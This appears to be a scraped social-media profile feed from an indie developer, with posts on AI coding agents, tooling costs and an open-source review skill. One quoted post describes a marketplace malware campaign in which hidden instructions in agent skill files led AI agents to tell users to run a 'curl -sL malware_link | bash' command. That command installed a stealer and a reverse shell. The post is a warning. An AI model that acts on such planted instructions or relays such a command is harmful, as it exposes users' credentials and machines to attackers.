JMC

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JMC

JMC

@jmc_dev

Indie Dev | Web & iOS https://t.co/qrwP8gmnEM | https://t.co/NjjM1gfmix

가입일 Ağustos 2012
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JMC@jmc_dev·
@alfdefolf It will be developed further behind the scenes and used by government to frame people for crimes and spread even more disinformation with no ability for anyone to dispute that the footage is fake.
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I just claimed my .agent domain and joined the .agent community! get yours now and help shape the future of autonomous agents #BK6RNLV6" target="_blank" rel="nofollow noopener">agentcommunity.org/join#BK6RNLV6 @agentcommunity_
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I forked CodexMonitor by @Dimillian and adapted it for @opencode. If you liked the CodexMonitor UI, OpenCodeMonitor is basically that experience for OpenCode. Curious what features people would want added!
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JMC@jmc_dev·
Just made OpenCode Monitor public: a desktop app for monitoring and interacting with OpenCode agents across multiple workspaces. I really liked the CodexMonitor interface and wanted something similar for OpenCode. Let me know what you think! github.com/jacobjmc/OpenC…
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JMC@jmc_dev·
@jakezward pSEO but not location pages. You rolled out free tool and resource pages with niche modifiers. ~2k under /tools/, 7.5k under /resources/, 2.8k under /for/. "tool for niche" at scale.
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@DanKulkov Copilot pro is way better value than claude code pro
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Dan Kulkov@DanKulkov·
i think $20 claude code and $20 chatgpt + codex is the perfect value combo that's enough to build 80% of time but it still forces you to do marketing because of limits
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JMC@jmc_dev·
Built priority-review: an open-source skill for AI coding agents that does evidence-based code review with P0–P3 severity + confidence labels. Portable via skills.sh, with optional Claude/OpenCode command + subagent wrappers. github.com/jacobjmc/prior… npx skills add jacobjmc/priority-review
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@wholyv The copilot models don't seem to have thinking enabled though (or at least not configurable)
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lyv ⌘@wholyv·
okay, confirmed it. fuck antigravity and cursor atp. Buy GitHub Copilot pro (most expensive pack) login via it in opencode enjoy far more claude code limits that you normally would for double the price.
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JMC@jmc_dev·
@SecretCFO ChatGPT feels like it's performing helpfulness, which comes off as annoying. Claude just responds to what you actually said.
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The Secret CFO@SecretCFO·
Claude has really nailed the conversation flow as a thinking partner, in a way that ChatGPT hasn't. A back and forth is so much easier. ChatGPT feels like that try hard friend who won't shut the fuck up, by comparison.
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JMC@jmc_dev·
TIL you can consolidate scattered VS Code windows into native macOS tabs. Just set "window.nativeTabs" to true in your settings. Then run the "Merge All Windows" command to bring them all into one clean workspace.
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JMC@jmc_dev·
Every time i try to make one agent do everything it gets worse at all of it. Smaller agents with one job each just work better
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Ian Nuttall@iannuttall·
Has anybody figured out how to give a video to AI and have it look at the scenes to summarise what the video shows, where transitions are, etc?
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@iannuttall The move for Conductor is to build on opencode. Then users can pick whatever model and customizations they want
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Ian Nuttall@iannuttall·
If Conductor has to go to API keys, this sucks for them and for us as consumers. I would expect huge improvements to their Codex integration very shortly as the new default model. Anthropic just want that enterprise $$$ and fuck the devs, it seems...
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JMC@jmc_dev·
The thing that gets me is how naturally people trust a skill file. It's markdown, it's readable, it looks fine. But the agent isn't reading it the way you are. It's reading it as instructions to act on, and if someone has hidden something in there, that's where the damage happens.
chiefofautism@chiefofautism

the #1 most downloaded skill on OpenClaw marketplace was MALWARE it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server 1,184 malicious skills found, one attacker uploaded 677 packages ALONE OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins you install a skill, your AI agent gets new powers, this sounds great the problem? ClawHub let ANYONE publish with just a 1 week old github account attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command > to enable this feature please run: curl -sL malware_link | bash that one command installed Atomic Stealer on macOS it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1 this is npm supply chain attacks all over again except the package can THINK and has root access to your life

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JMC@jmc_dev·
People keep asking what the moat is for AI tools. I think it's the same as it always was: understanding your users deeply enough that the default config already works. No amount of model access replaces knowing what people actually need built.
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JMC@jmc_dev·
Bridging digital agents to physical output is something I've been thinking about a lot. The moment your agent can print, cut, or assemble, the use cases multiply in ways we haven't fully mapped out yet
Jesse Genet@jessegenet

So, @openclaw can use a computer but lacks physicality… I’ve been solving that by taking photos of physical things (like books to digest), but what if I gave it access to my 3D printer!? Going to see what this can do for our homeschool curriculum 📚🤓

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